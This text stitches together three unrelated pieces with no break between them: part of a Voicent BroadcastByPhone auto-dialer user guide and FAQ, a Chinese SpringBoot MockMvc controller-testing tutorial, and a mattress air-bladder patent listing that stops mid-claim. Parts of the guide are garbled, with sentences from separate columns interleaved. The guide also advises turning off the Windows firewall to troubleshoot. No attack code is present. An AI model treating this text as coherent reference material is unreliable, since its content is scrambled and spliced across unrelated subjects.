format conversion, message editing and reduce silent period at the beginning of the message. About telephone audio quality The standard telephone audio format is set to PCM 8 KHz, 16 bit, Mono. The audio format determines the audio quality. No matter what format/quality (such as stereo) of your original audio recording is, it has to be converted to the standard format in order to play over the phone. Thus if you do not have a professional recording studio, you should use the built-in Voicent telephone recording for best sound quality. Microphone recording tend to have more noises. Although there many ways to create an audio wave file for voice broadcasting, we recommend using telephone to record your voice message to get the best sound quality and reduce message editing effort. An added benefit of Voicent telephone recording is that it can be recorded remotely. Converting to the standard audio format If an audio file is not saved in a standard format, it can be converted to the standard format by the sound recorder program. Please refer to the previous section under “Recording using Sound Recorder” for details. If your recording is done through a professional recording studio, you should ask the file be saved in the telephony format. Converting the audio file yourself normally introduces hisses and noises in the audio. - 18 - VOICENT COMMUNICATIO NS INC USING BROADCASTBYPHONE To invoke BroadcastByPhone, click the icon on Windows. The main window is a spreadsheet like area for entering name and phone numbers. The Status column will be filled by the program after calls are made. You can copy-paste call list from/to programs like Microsoft Excel. You can also import call list from a text file. I. Prepare broadcast calls 2. Create a call list. Enter names and phone numbers. Save the call list by click file -> save. You need to give a file name such as test. The file will be saved as .voc format (test.voc) Note: Remember that your modem occupies one phone line; you need another phone line to receive the reminder call, such as your cell phone. 3. Start broadcasting. Select from main menu Broadcast à Start/Schedule. Click on the Browse button to select the audio file to broadcast. In the File Open window, please navigate to the directory that contains your audio file. If you do not have an existing audio file, you can select the standard sample message. Select Start Now check box. Then click OK. Your modem should start to dial. - 19 - VOICENT COMMUNICATIO NS INC 4. When you receive the phone call, pick up the phone and say hello. Once BroadcastByPhone detects a human voice, it will play the audio message. If an answering machine or voice mail answers the phone, the software will detect it and leave a message after the beep. Please say “hello” after answering the phone call. The system will play the message after it a) detects a human voice; b) detects an answering machine and a beep, or c) time out after several seconds of silence. 5. If you did not hear modem dial or the phone did not ring, please check see if your modem and phone line is set up properly. Please also take a look at the FAQ section in this document. II. Customize broadcast message If you have professional version of BroadcastByPhone, you can customize broadcast message for each phone call. You can also play different messages for human pick up or for answering machine. In this section, we’ll create a book overdue reminder message for a community library. In the message, a general library overdue message is played as well as the overdue book name. For example, the message could be like this: “Hi, this message is from San Francisco city library. You have checked out a book that is overdue. The book title is: [the book title].” A. Record your message Since the general overdue message (without the book title) is the same for every phone call, we can use a pre-recorded message. Please see RECORD YOUR MESSAGE section for details to record an audio message. In this example, we’ll call this file overdue.wav. - 20 - VOICENT COMMUNICATIO NS INC B. Design a customized message template 1) Invoke the Message Designer by selecting Broadcast à Message Designer from the main menu. In the Message List dialog, click on New. The Message Designer dialog should appear. 2) From the Message Designer Dialog, click New. In the New Message Item dialog, select Audio Message. Click on the Browse button to select the overdue.wav file. Click OK. The new audio item should appear in the Message Item window. 3) Click New button again. In the Message Item dialog, select Specific to each call. Give the Column Header as Book Title, then select text-to-speech for the column type. 4) Now you should have two items in the Message Items window as shown in the first diagram here. Enter “Book Overdue” for Message ID in the dialog. Click OK to save the designed message template. C. Start Broadcasting Once you have the message template designed, you can select it for your call list. Select New from the main menu of BroadcastByPhone. In the Select Message dialog, select Custom Designed, and then select “Book Overdue”. - 21 - VOICENT COMMUNICATIO NS INC You can see that a new column BookTitle is inserted automatically. The content of the column will be used in each phone call to announce the overdue book title using text-to-speech technology. For example shown above, the first call to John Smith will say the book title as “American History” after playing the general overdue message. III. Collecting responses With professional version of BroadcastByPhone, it is also response from each phone call. The response can cancellation, or any custom designed response code. It is people to leave a voice message. In this section, we’ll invitation with confirmation. This message is like this: possible to collect be confirmation, also possible to let set up a meeting “Hi, the January organization meeting will be held this Friday in the corporate conference room. Please press 1 to confirm your attendance, press 2 to decline, press 3 to leave us a message, press 9 to play this message again.” Please record the message in a file called meeting.wav. Now we’ll use the Message Designer to design a message template to collect user responses. 1) Select Broadcast à Message Designer from the main menu. In the Message List dialog, click the New button. In the message ID text input window, type in Meeting. - 22 - VOICENT COMMUNICATIO NS INC Since responses can not be collected if an answering machine answers the phone call. We have to design the message differently for human pick up and answering machine. Select the check box Play different messages for answering machine and human pickup. 2) Select message items for Answering Machine. Click New, then in the New Message dialog, click Browse, and then select the audio file meeting.wav. Click OK. 3) Select message items for human pickup. In the dropdown box, select Human. Click New, then in the New Message dialog, click Browse, and then select the audio file meeting.wav. Click OK. 4) In the Message Designer window, select the check box Need Confirmation or response. Click the New button. The New Confirmation Item dialog should appear. Select Press. Enter 1 in the text box on the right. The Confirm Yes should be selected. Click OK. The new confirmation item should appear in the confirmation items window in the Message Designer dialog. Click New again. Select Press. Enter 2 in the text box on the right. Select Confirm No. Click OK. Now the second confirmation item is added. Click New again. Select Press. Enter 3 in the text box on the right. Select Leave message. Click OK. Click New again. Select Press. Enter 9 in the text box on the right. Select Replay message. Click OK. 6. Click OK to save the new message template. 7. Now you are ready to use the new message template to send out your new meeting notice. Start Broadcast Create a new call list based on the new message template. Select New from the File main menu. In the Choose Message dialog, select the Meeting - 23 - VOICENT COMMUNICATIO NS INC message. In the main spreadsheet window, you can see there is a new column titled Confirmation. Enter the names and phone numbers for the meeting attendees. Start broadcasting by select Broadcast à Start/schedule. Click Start Now. The Broadcast Message in the dialog displays the message ID of the call. Since the audio message is already select in the message template, there is no need to select an audio file here as we did in the previous sections. After calls are made, you can check the confirmation column about all responses. The results should look like the following figure. In the third column, you can click on the Message to hear the voice message. After you click on it, your wav file player program will be invoked, allowing you to hear the message. - 24 - VOICENT COMMUNICATIO NS INC WHAT’S NEXT Start using it. Help topics are accessible from the main menu. More information can be accessed from Voicent’s website at http://www.voicent.com/support. If you are using the shareware version, you can Purchase a product license from http://www.voicent.com. If you are a software developer, please take a look at the developer section of Voicent’s website. Voicent Gateway is a standard based development platform for interactive telephony applications. The online tutorial contains information to develop both inbound and outbound applications. - 25 - VOICENT COMMUNICATIO NS INC F R E Q U E N T L Y A S K E D Q U ES T I O N S ( F A Q ) Generic questions for all product G1. What is Voicent product used for? Voicent product is an automated telephone notification system that runs on any desktop PC or laptop computer. It is widely used by medical professionals, churches, schools, small businesses, organizations, and any entity requires automatic telephone communications. Here are some sample applications: • Doctor Offices use it for automatic appointment reminder calls. • Churches use it for event notification and prayer chains. • Politicians use it for voter communications and vote reminders • Mortgage brokers use it for lead generation and rate notifications. • Businesses use it for pickup/delivery notifications. • IT professionals use it for automatic system crash notifications. • School PTAs use it for fundraising and event notifications. • Non profit associations use it for monthly meeting notifications G2. What’s the difference between AutoReminder and BroadcastByPhone? AutoReminder is telephone reminder software that calls individual person or small group of people at specific time for specific event. It is mostly suitable for appointment related applications, such as reminder calls for doctor offices. BroadcastByPhone is telephone notification system that calls a list of phone numbers to broadcast a pre-recorded message. It is mostly suitable for organizations such as church and businesses. Both products are capable for confirmation, message customization, and detection of human pickup and answering machine. G3. What’s the difference professional version? - 26 - between the standard and VOICENT COMMUNICATIO NS INC The major differences are: 1). Professional version supports interactive touch tone response and voice message; and 2). Professional version is capable of playing different messages for human pick up vs. answering machine; and 3). Professional version can customize and personalize your telephone message using a built-in Message Designer. With Professional version, the system can: I. Collect confirmation or response from recipient. The person who receives the call can, for example, press 1 to confirm, press 2 to cancel, and press 3 to leave a voice message. You can design the confirmation prompt anyway you like. II. Play different message for answering machine and for human pickup. This feature can be used for callers who wish to play different messages to human and answering machine. Sometimes, you only want to leave messages on the answering machine. So you can specify no audio file for human pick up, and have a real message played when it is answered by an answering machine or voice mail system. III. Use speech command. For example, to replay the message, the person who receives the call can replay the phone messages by saying a voice command like Play It Again. If you have important information like your name or phone numbers that need the person to write it down, the replay feature will allow them to repeat the info and have enough time to do so. IV. Broadcast personalized messages include each person’s name, a specific message just for that person, either using text-to-speech or pre-recorded audio file. It can play different messages to different people. Examples: "Hi, [Mr. Gate], [happy birthday], this is John Green. Please vote for me for my next election. If you want to hear this message again, please say Play It Again. The words in italic with a bracket […] can be replaced with any words you choose. The standard version of Voicent BroadcastByPhone is only capable of broadcast one pre-recorded voice message to the entire call list. You can not play different voice messages during broadcast. No response can be recorded from the recipients. The Professional version of BroadcastByPhone has a “call till confirm” feature that can be used in a call escalation process. It also has the ability to “automatically schedule call for next day” if the current call list is too long and cannot be finished before the cutoff time. - 27 - VOICENT COMMUNICATIO NS INC The Standard version of Voicent AutoReminder uses a fixed reminder message and thus is only suitable for appointment reminder calls. For doctor offices, we recommend the Professional version so patients can confirm their appointments. G4. I’ve installed Voicent software. I hear the modem dialing, but the phone number it just dialed doesn’t ring. What’s wrong? 1). First Check you phone line. If you use a regular phone line, please check your phone line connection. Make sure it has dial tone. When you use a regular phone line for the software, please make sure to plug one end of the phone cord into the modem jack marked LINE. Plug the other end into a phone jack (the wall jack where you normally connect a phone). If you have a spare phone available, plug your phone into the modem PHONE jack if you want to use a phone on the same line with the modem. Your phone will work normally even if the computer is turned off. You can use the phone to test the phone line to see if it works or not. If you use a phone line that also has broadband connection like DSL, please make sure you don’ t conne ct your modem to the wrong jack that belongs to DSL line. If you are using VoIP connection, you need to connect the voice modem LINE jack to a Voicent Terminal such as Motorola VT1005. It converts the digital line to analog line. 2). Check whether you are using Voicent 3025c data/fax/voice modem. You are most likely to experience the problem if you are not using the supported voice modem. Especially with soft modems, the call quality and reliability will be poor. Please refer to the Installation section of this guide for more details. You can order one from our website at http://www.voicent.com/store 3). Check whether your modem driver is installed correctly Please refer to the Installation section of this guide for more details. G5. Do I have a voice modem? - 28 - VOICENT COMMUNICATIO NS INC The best way to find out is to install the Voicent software and run the program. If you have installed Voicent software and see an error message Voicent Gateway cannot find a voice capable modem, then your system does not have a voice modem. Without a voice modem, no phone call can be made. To see what modem is installed on your system, please refer to the Installation session of this guide. G6. I have purchased a Voicent 3025/Zoom 3025/Zoom 2985/Zoom 3049 voice modem and the system still cannot detect a voice capable modem? Please check your modem driver settings. The detailed instruction is listed in section title “Install modem and connect it to a phone line” under INSTALLATION. G7. Do I must use a Voicent 3025 voice modem? Not necessarily. We officially support Voicent modem and Zoom 3025 internal PCI modem. There are many other voice modems that will work with the software. But if you use other modem brand, we cannot guarantee the performance and reliability. G8. Can I setup multiple modems on multiple lines for one computer? Not at this time. We support one computer with one voice modem, which allows only one phone line. If you need to have multiple lines, you can use multiple computers. G9. The software works. But when it dials out, there is a real long delay before the message plays. It’s about 10 seconds. It will cause people to hang up. How can I fix this problem? Voicent software has about 2-3 second delay when a call is answered. If the delay is longer than 3 seconds, please check the following: 1. Your modem. If you don’t have a voice modem that is recommended by Voicent, please get a recommended modem from Voicent. Some voice modems don’t have the right TAPI implementation and it won’t recognize the voice over telephone. 2. Your modem driver. Even if you have the right modem, the modem driver (the software that runs the modem) may not be compatible. You need to install a driver that is the latest. The driver software can usually be downloaded from modem vendor’s website at no cost. 3. You computer is too old or has too little memory. - 29 - VOICENT COMMUNICATIO NS INC 4. Your sound card quality is poor. 5. Your have a noisy phone. You can try a different phone line to see if the delay will be eliminated. 6. Check your audio recording. Make sure there is no silence at the beginning of the recording. G10. Can your program interface directly with MS Access database without using a comma separated file first and import command? The normal operation is export a comma separated file from your database or other systems and then import the file to Voicent programs. The program can not interface with MS Access database directly since we won't know the schema of your database. However, it is easy to integration with us using AutoReminder's Openweb access. Please see http://www.voicent.com/devnet/reminder_integ.htm. Actual working samples are provided for the integration on our website. Voicent also offers sales@voicent.com. integration service. Please contact G11. How do I open the Voicent Gateway to get the gateway ID number from my computer? If you are using XP, look at the taskbar at the bottom of your screen. There should be a clock on the right bottom corner. Next to it, there is a double arrow << called Hidden Icon. Click on <<, it will expose all hidden icons. Voicent Gateway should appear. Click on Voicent Gateway icon , the gateway main window should pop up. Your gateway ID is shown in the window. If you are using Windows 2000, the right bottom corner of the task bar should contain the Voicent Gateway icon main window. . Click on it to invoke the G12. I have a voice modem (not Voicent modem) with voice capability and speakerphone ready. It's also dialing out and phone also rings. How come I can't hear the voice message on the other end? - 30 - VOICENT COMMUNICATIO NS INC 1. Your modem is not compatible. There are many brands of voice modems are on the market, not all voice modems work with the software. We officially support Voicent modem model 3025 or Zoom 3025c voice modems. 2. Make sure your computer has a sound card that can play .wav file. 3. Make sure your phone line is connected and has dial tone through the modem. (See G1.) 4. When you pick up the phone that rings, make sure to say hello and wait for a couple seconds. 5. In rare case the motherboard, modem card and device driver combination can cause problem. If you suspect this is the case, try a different computer. G13. I would like to know if your company knows of any office management software that can be used in conjunction with the AutoReminder application. Voicent AutoReminder can be integrated with any office management software because AutoReminder has Open Web access interface that allows other programs to interface with. Please see http://www.voicent.com/devnet/reminder_integ.htm for detailed information. There is also a command line interface for integration. You can have a programmer do the integration for you, or contact Voicent for the technical service. We have expert knowledge on integrations. G14. Do I need a dialogic card or internet connection to use AutoReminder or BroadcastByPhone software? No. You only need a voice modem. We support Voicent voice modem, model 3025. You can use the software with VoIP, but you still need a voice modem that is connected to the VoIP Voice Terminal. G15. The audio quality of the wav recordings is not good. My recorded message sounds really bad. Can I improve the quality? Yes, you can. 1). Use Voicent 3025 modem if you are not using it now. Some voice modems and their driver are of poor quality. - 31 - VOICENT COMMUNICATIO NS INC 2.) You have a bad phone line on either or both outbound and inbound phone lines. If you use a cell phone, the wireless reception can be bad. Try to use different phone line or different cell phone. 3).Your machine or sound card is not good quality. 4).Try to use telephone recording as described in RECORD YOUR MESSAGE section of this document. 5).Use a better microphone and a less noisy recording room. G16. Do I need Java and Voicent Gateway to run AutoReminder or BroadcastByPhone? Yes. You must install these two programs before you install others. G17. My computer is hooked up with high speed internet connection like cable modem or DSL. Can I use Voicent software? Yes. Voicent software does not use Internet connection. All you need is a voice modem that connects to a phone line or VoIP Voice Terminal to make phone calls. Cable modem or DSL modem cannot be used to make phone calls. But it does not matter. The actually phone calls are made through the voice modem. Questions for BroadcastByPhone and AutoReminder B1. I want to use the Voicent BroadcastByPhone or AutoReminder system. Do I have to purchase Voicent Gateway? No. BroadcastByPhone and AutoReminder software package includes Voicent Gateway. B2. I am running BroadcastByPhone. It stopped after a few calls. What happened? Your computer modem is not reliable. Try to use Voicent modem 3025. If the modem is OK, check your phone line to see if it has dial tone. In rare case, the combination of motherboard and modem doesn’t work well together. Also please check your dialing rules. In Voicent Gateway, please select Setup à Options for setting dialing rules suitable for your phone service. - 32 - VOICENT COMMUNICATIO NS INC B3. When I start Voicent AutoReminder/BroadcastByPhone I got an error message saying Failed to connect to Voicent Gateway? Voicent Applications, AutoReminder and BroadcastByPhone, are separate programs from the Voicent Gateway. The Gateway is actually the program that makes the phone calls. In order for AutoReminder or BroadcastByPhone to work, a connection with the gateway has to be established. Check whether Voicent Gateway is started or not. Click on the gateway icon on the taskbar, the status should be running. If the gateway is still in the process of starting up, please just wait till the status changed to running, and then invoke AutoReminder or BroadcastByPhone again. If Voicent Gateway failed to start, or AutoReminder and BroadcastByPhone still cannot connect to a running gateway, then please check your firewall and antivirus programs. Windows XP contains a built-in firewall program that can be access from the control panel. These programs might block Voicent Gateway from accepting connections. The following processes are part of the Voicent Gateway. Please refer to your firewall or antivirus program manuals for ways to unblock the gateway. vxengine.exe: spengine.exe: javaw.exe: javaw.exe: telephony engine of the gateway speech engine of the gateway VoiceXML interpreter Voicent applications server Voicent Gateway normally listens on port 8155, 8255, 8355, and 8455. If you are not sure whether Voicent Gateway is blocked by your firewall or antivirus program, you can disable or uninstall it first. You can enable and reinstall it later. To disable Windows XP firewall, please click the Start button, then select Control Panel, then click Windows Firewall. From the firewall window, select the Off checkbox. B4. How do I import phone BroadcastByPhone call list? numbers directly into There are two ways to import the phone list: 1) Use file -> import feature in BroadcastByPhone program window. Or, - 33 - VOICENT COMMUNICATIO NS INC 2) Use copy & paste: Import your phone list from your database file to Microsoft Excel spreadsheet first, then copy-and-paste the whole list to the phone section of BroadcastByPhone spreadsheet. B5. I have a large call list that cannot be finished in a day. I set up the broadcast as recurring calls every morning. But the calls always start from the beginning. You should select the checkbox “automatically schedule calls for next day if not finished” in the Start/Schedule broadcast dialog. This feature is only available in the professional version. Recurring calls are used for events like monthly meetings. It always starts from the beginning of the call list. B6. What is a Call till Confirm broadcast? This is a broadcast mode that usually used in call escalation process. For example, support engineers John, Joe, and Jason are the people to notify when the alarm go off. If John is available, there is no need to notify Joe and Jason. To set up the Call till Confirm broadcast, select the checkbox “Stop broadcast after getting confirmation code” and set the confirmation code in the next edit box. If John is not available when called, the program will call Joe; and if Joe enters the confirmation code, the program will not call Jason and broadcast will stop automatically. It is possible to use this mode from the command line interface. If you have an alert system and a call escalation process, you can easily integrate it with Voicent BroadcastByPhone. Please refer to the program help file for details. Questions for EmailToPhone E1. I have set up the Voicent gateway with EmailToPhone. When I call in to get my email message, I get a message the server is not available, good bye. How do I correct this? Please check your email settings. This normally indicates your POP3/IMAP server cannot be accessed. Questions for Voicent Gateway SDK - 34 - VOICENT COMMUNICATIO NS INC D1. Do you sell an SDK that would allow me to add an alternative means of user interface? Yes. There are two ways to do it: A. To interface with AutoReminder. The interface is easy to use. You need to build your application based on AutoReminder professional version. Please refer to http://www.voicent.com/devnet/reminder_integ.htm B. To directly integrate with Voicent Gateway Use Client SDK. With this library, your app can directly integrate with Voicent Gateway. Please check our website for tutorial and more documentation. D2. Does Voicent Gateway support VoIP? W support VoIP configuration with Voice Terminal. See Configuration section on how to set VoIP with Voicent software. D3. Can the software record touch tone responses to audio prompts? Yes, Voicent Gateway can handle speech recognition as well as DTMF tones. To see an application of DTMF tones, check out http://www.emailtophone.com. The software uses DTMF tones for checking password. D4. We want to integrate Voicent software with other software like office management software that does the billing and report. Can we do that? Absolutely. If you need help on integration, please contact us by phone or email. There will be a fee based on our engineering’s time and effort. We have expert knowledge on our software and can save you a lot of time and effort on integration. - 35 - VOICENT COMMUNICATIO NS INC GETTING HELP If you still have problems after going through this document, we are glad to assist you. There are several ways to get help from us: Please make sure that you are using Voicent 3025 data/fax/voice modem. Problems like poor call quality, delay at the beginning of the audio message are most likely cause by a poor quality voice modem. We do not support other brand of voice modems. 1). If you have general product questions Please check our website or send your question to sales@voicent.com or support@voicent.com 2). For technical support, contact us through email with log files attached This is the preferred way. Our support engineers need these log files to better diagnose problems. You’ll get a faster response when log files are attached. Please also note that if you stop and restart the gateway, the log file will be overwritten. Only one backup copy is kept. You should send us the log files right after you experience any problem. There are two ways to send us the log file: (1). Click on Voicent Gateway icon, when the gateway window pops up, select Help à Report Problem. Write down the problem description and click OK; or, (2). Email us at support@voicent.com. Attach your gateway log files in your email. (output.log and output1.log, which usually located at C:\Program Files\Voicent\Gateway\logs) 3). Contact us by phone - 36 - VOICENT COMMUNICATIO NS INC Phone support is not free. You have to have a support contract before calling technical support. If you would like to purchase per incident support, call 800. 948.1198. Copyright: This document contains proprietary information protected by copyright, and this Quick Start Guide and all the accompanying hardware, software, and documentation are copyrighted. @ Copyright 2003, 2004, 2005. Voicent Communications, Inc. All rights reserved. - 37 -
SpringBoot对Controller进行单元测试的实现代码 附乱码解决方案 Controller代码 package com.keafmd.controller; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.RestController; import java.util.HashMap; import java.util.Map; /** * Keafmd * * @ClassName: HelloController * @Description: * @author: 牛哄哄的柯南 * @Date: 2021-04-02 9:42 * @Blog: https://keafmd.blog.csdn.net/ */ @RestController public class HelloController { @RequestMapping("/hello") Map hello(){ Map map = new HashMap(); map.put("keafmd","牛哄哄的柯南"); map.put("success",true); return map; } } 单元测试代码 package com.keafmd; import com.keafmd.SpringBoot02Application; import com.keafmd.controller.HelloController; import org.junit.jupiter.api.BeforeEach; import org.junit.jupiter.api.Test; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.boot.test.autoconfigure.web.servlet.AutoConfigureMockMvc; import org.springframework.boot.test.context.SpringBootTest; import org.springframework.http.MediaType; import org.springframework.test.context.ContextConfiguration; import org.springframework.test.context.web.WebAppConfiguration; import org.springframework.test.web.servlet.MockMvc; import org.springframework.test.web.servlet.MvcResult; import org.springframework.test.web.servlet.request.MockMvcRequestBuilders; import org.springframework.test.web.servlet.result.MockMvcResultHandlers; import org.springframework.test.web.servlet.result.MockMvcResultMatchers; import org.springframework.test.web.servlet.setup.MockMvcBuilders; import org.springframework.web.context.WebApplicationContext; /** * Keafmd * * @ClassName: MvcTest * @Description: * @author: 牛哄哄的柯南 * @Date: 2021-04-02 10:59 * @Blog: https://keafmd.blog.csdn.net/ */ @SpringBootTest(classes = SpringBoot02Application.class) @AutoConfigureMockMvc //相当于是使用 context 上下文构造一个 mvc对象 public class MvcTest { //模拟访问 Controller @Autowired MockMvc mvc; @Test public void test() throws Exception { MvcResult result = mvc.perform( MockMvcRequestBuilders.get("/hello"). accept(MediaType.APPLICATION_JSON)). andExpect(MockMvcResultMatchers.status().isOk()). andDo(MockMvcResultHandlers.print()).andReturn(); } } 测试结果 SpringBoot对Controller进行单元测试的实现代码 附乱码解决方案_第1张图片 乱码解决 把注解替换为:↓ @RequestMapping(value = "/hello",produces = {"application/json;charset=UTF-8"}) HelloController: package com.keafmd.controller; import org.springframework.web.bind.annotation.GetMapping; import org.springframework.web.bind.annotation.PostMapping; import org.springframework.web.bind.annotation.RequestMapping; import org.springframework.web.bind.annotation.RestController; import java.util.HashMap; import java.util.Map; /** * Keafmd * * @ClassName: HelloController * @Description: * @author: 牛哄哄的柯南 * @Date: 2021-04-02 9:42 * @Blog: https://keafmd.blog.csdn.net/ */ @RestController public class HelloController { @RequestMapping(value = "/hello",produces = {"application/json;charset=UTF-8"}) //@RequestMapping("/hello") Map hello(){ Map map = new HashMap(); map.put("keafmd","牛哄哄的柯南"); map.put("success",true); return map; } } 解决乱码后的效果: SpringBoot对Controller进行单元测试的实现代码 附乱码解决方案_第2张图片 到此这篇关于SpringBoot对Controller进行单元测试的实现代码 附乱码解决方案的文章就介绍到这了,更多相关SpringBoot Controller单元测试内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家! 你可能感兴趣的
Inventors list Assignees list Classification tree browser Top 100 Inventors Top 100 Assignees Patent application title: RESILIENT MATERIAL/AIR BLADDER SYSTEM Inventors:  Steven Doehler (Cincinnatti, OH, US)  James H. Price (Mount Pleasant, SC, US) Assignees:  GAYMAR INDUSTRIES, INC. IPC8 Class: AA47C2710FI USPC Class: 5713 Class name: Mattress (for whole body) having confined gas (e.g., air mattress) variably pressurizable chambers (e.g., with pump) Publication date: 2010-03-25 Patent application number: 20100071137 Sign up to receive free email alerts when patent applications with chosen keywords are published SIGN UP Abstract: A fluid bladder system has a conventional fluid bladder and a resilient member in the fluid bladder. The resilient member is of a size that it allows the fluid in the fluid bladder to be the principal support applied to the patient. The resilient member only applies a force to the patient only after the patient displaces the fluid in the fluid bladder so the resilient structure is the only entity that inhibits the patient from bottoming out. Claims: 1. A therapeutic support comprisinga rotational (turn-assist) bladder system and a control unit;the rotational (turn-assist) bladder system has a right side bladder component and a left side bladder component positioned on a support surface;the right side bladder component has(I) a first right section with a first right resilient structure(a) positioned on the first right section's bottom surface and(b) has a height that(i) allows the fluid in the first right section to be the primary patient support in the first right section, and(ii) inhibits a patient from bottoming out only when the patient's weight displaces the first right section's fluid from being positioned between the patient and the support surface; and(II) a second right section with a second right resilient structure(a) positioned on the second right section's bottom surface and(b) has a height that(i) allows the fluid in the second right section to be the primary patient support in the second right section and(ii) inhibits a patient from bottoming out only when the patient's weight displaces the second right section's fluid from being positioned between the patient and the support surface; andthe left side bladder component has(I) a first left section with a first left resilient structure(a) positioned on the first left section's bottom surface and(b) has a height that(i) allows the fluid in the first left section to be the primary patient support in the first left section, and(ii) inhibits a patient from bottoming out only when the patient's weight displaces the first left section's fluid from being positioned between the patient and the support surface; and(II) a second left section with a second left foam section(a) positioned on the second left section's bottom surface and(b) has a height that(i) allows the fluid in the second left section to be the primary patient support in the second left section, and(ii) inhibits a patient from bottoming out only when the patient's weight displaces the second left section's fluid from being positioned between the patient and the support surface. 2. The therapeutic support further comprising:the first right section interconnects to the control unit through a first right conduit and the second right section interconnects to the control unit through a second right conduit;the first left section interconnects to the control unit through a first left conduit and the second left section interconnects to the control unit through a second left conduit;the control unit pushes, pulls and/or allows a fluid into, through or pass into (a) the first left conduit to the first left section, (b) the second left conduit to the second left section, (c) the first right conduit to the first right section and/or (d) the second right conduit to the second right section;the control unit has (a) a first left valve that controls (i) when the fluid enters the first left conduit, (ii) the amount of fluid that enters the first left conduit and (iii) the rate the fluid enter the first left conduit, (b) a second left valve that controls (i) when the fluid enters the second left conduit, (ii) the amount of fluid that enters the second left conduit and (iii) the rate the fluid enter the second left conduit, (c) a first right valve that controls (i) when the fluid enters the first right conduit, (ii) the amount of fluid that enters the first right conduit and (iii) the rate the fluid enter the first right conduit; and (d) a second right valve that controls (i) when the fluid enters the second right conduit, (ii) the amount of fluid that enters the second right conduit and (iii) the rate the fluid enter the second right conduit;wherein the first right section and the second right section can be (a) inflated at (i) the same pressure level or different pressure levels, (ii) the same inflation rate or different inflation rates and/or (iii) the same time or different times; and/or (b) deflated at (i) the same time or different times, (ii) the same inflation rate or different inflation rates and/or (iii) the same pressure level or different pressure levels to allow a patient assistant to have access to and to provide care and/or treatment to a particular patient's body part that is positioned over the first right section or the second right section when the first right section or the second right section are inflated to rotate (turn) the patient and the other right section is (a) being inflated, (b) deflated or (c) being deflated;wherein the first left section and the second left section can be (a) inflated at (i) the same pressure level or different pressure levels, (ii) the same inflation rate or different inflation rates and/or (iii) the same time or different times; and/or (b) deflated at (i) the same time or different times, (ii) the same inflation rate or different inflation rates and/or (iii) the same pressure level or different pressure levels to allow a patient assistant to have access to and to provide care and/or treatment to a particular patient's body part that is positioned over the first left section or the second left section when the first left section or the second left section are inflated to rotate (turn) the patient and the other left section is (a) being inflated, (b) deflated or (c) being deflated. 3. The therapeutic support of claim 1 wherein the control unit has an input system that allows a patient and/or patient assistant to control the first left valve, the second left valve, the first right valve, and the second right valve. 4. The therapeutic support of claim 3 wherein the control unit has a microprocessor, and the microprocessor is interconnected between (i) the input system and (ii) the first left valve, the second left valve, the first right valve, and the second right valve. 5. The therapeutic support of claim 1 wherein the rotational (turn-assist) bladder system uses low air loss bladders. 6. The therapeutic support of claim 1 wherein each resilient structure is selected from the group consisting of foam, gelastic material, foam in a bladder material, gelastic material in a bladder material or combinations thereof. 7. The therapeutic support of claim 1 further comprising a third right section wherein the third right section is interconnected to the control unit through an extension of the first right conduit or an extension of the second right conduit. 8. The therapeutic support of claim 1 further comprising a third right section wherein the third right section is interconnected to the control unit through a third right conduit. 9. The therapeutic support of claim 1 wherein the first right section and the second right section are horizontal in relation to the therapeutic support. 10. The therapeutic support of claim 1 wherein the first right section and the second right section are vertical in relation to the therapeutic support. 11. The therapeutic support of claim 1 wherein the first right section and the second right section extend the entire length of the therapeutic support. 12. The therapeutic support of claim 1 wherein the first right section and the second right section extend the partially along length of the therapeutic support. 13. The therapeutic support of claim 1 further comprising cushion material positioned over individual right and/or left sections; or opposing (a) first left and right sections or (b) second left and right sections. 14. The therapeutic support of claim 13 wherein the cushion material is selected from a static bladder, wave therapy bladders, gelastic material, foam, and combinations thereof. 16. The therapeutic support of claim 1 wherein the support surface is a mattress. 17. The therapeutic support of claim 1 wherein the support surface is a hospital bed frame. 18. The therapeutic support of claim 1 wherein the control unit is within the rotational (turn-assist) bladder system. 19. The therapeutic support of claim 1 wherein the control unit is exterior to the rotational (turn-assist) bladder system. 20. A method of treating a patient comprising:positioning a patient on a therapeutic support havinga rotational (turn-assist) bladder system and a control unit;the rotational (turn-assist) bladder system has a right side bladder component and a left side bladder component;the right side bladder component has(I) a first right section with a first right resilient structure(a) positioned on the first right section's bottom surface and(b) has a height that(i) allows the fluid in the first right section to be the primary patient support in the first right section, and(ii) inhibits a patient from bottoming out only when the patient's weight displaces the first right section's fluid from being positioned between the patient and the support surface; and(II) a second right section with a second right resilient structure(a) positioned on the second right section's bottom surface and(b) has a height that(i) allows the fluid in the second right section to be the primary patient support in the second right section and(ii) inhibits a patient from bottoming out only when the patient's weight displaces the second right section's fluid from being positioned between the patient and the support surface; andthe left side bladder component has(I) a first left section with a first left resilient structure(a) positioned on the first left section's bottom surface and(b) has a height that(i) allows the fluid in the first left section to be the primary patient support in the first left section, and(ii) inhibits a patient from bottoming out only when the patient's weight displaces the first left section's fluid from being positioned between the patient and the support surface; and(II) a second left section with a second left foam section(a) positioned on the second left section's bottom surface and(b) has a height that(i) allows the fluid in the second left section to be the primary patient support in the second left section, and(ii) inhibits a patient from bottoming out only when the patient's weight displaces the second left section's fluid from being positioned between the patient and the support surface;the first right section interconnects to the control unit through a first right conduit and the second right section interconnects to the control unit through a second right conduit;the first left section interconnects to the control unit through a first left conduit and the second left section interconnects to the control unit through a second left conduit;the control unit pushes, pulls and/or allows a fluid into, through or pass into (a) the first left conduit to the first left section, (b) the second left conduit to the second left section, (c) the first right conduit to the first right section and/or (d) the second right conduit to the second right section;the control unit has (a) a first left valve that controls (i) when the fluid enters the first left conduit, (ii) the amount of fluid that enters the first left conduit and (iii) the rate the fluid enter the first left conduit, (b) a second left valve that controls (i) when the fluid enters the second left conduit, (ii) the amount of fluid that enters the second left conduit and (iii) the rate the fluid enter the second left conduit, (c) a first right valve that controls (i) when the fluid enters the first right conduit, (ii) the amount of fluid that enters the first right conduit and (iii) the rate the fluid enter the first right conduit; and (d) a second right valve that controls (i) when the fluid enters the second right conduit, (ii) the amount of fluid that enters the second right conduit and (iii) the rate the fluid enter the second right conduit;wherein the first right section and the second right section can be (a) inflated at (i) the same pressure level or different pressure levels, (ii) the same inflation rate or different inflation rates and/or (iii) the same time or different times; and/or (b) deflated at (i) the same time or different times, (ii) the same inflation rate or different inflation rates and/or (iii) the same pressure level or different pressure levels to allow a patient assistant to have access to and to provide care and/or treatment to a particular patient's body part that is positioned over the first right section or the second right section when the first right section or the second right section are inflated to rotate (turn) the patient and the other right section is (a) being 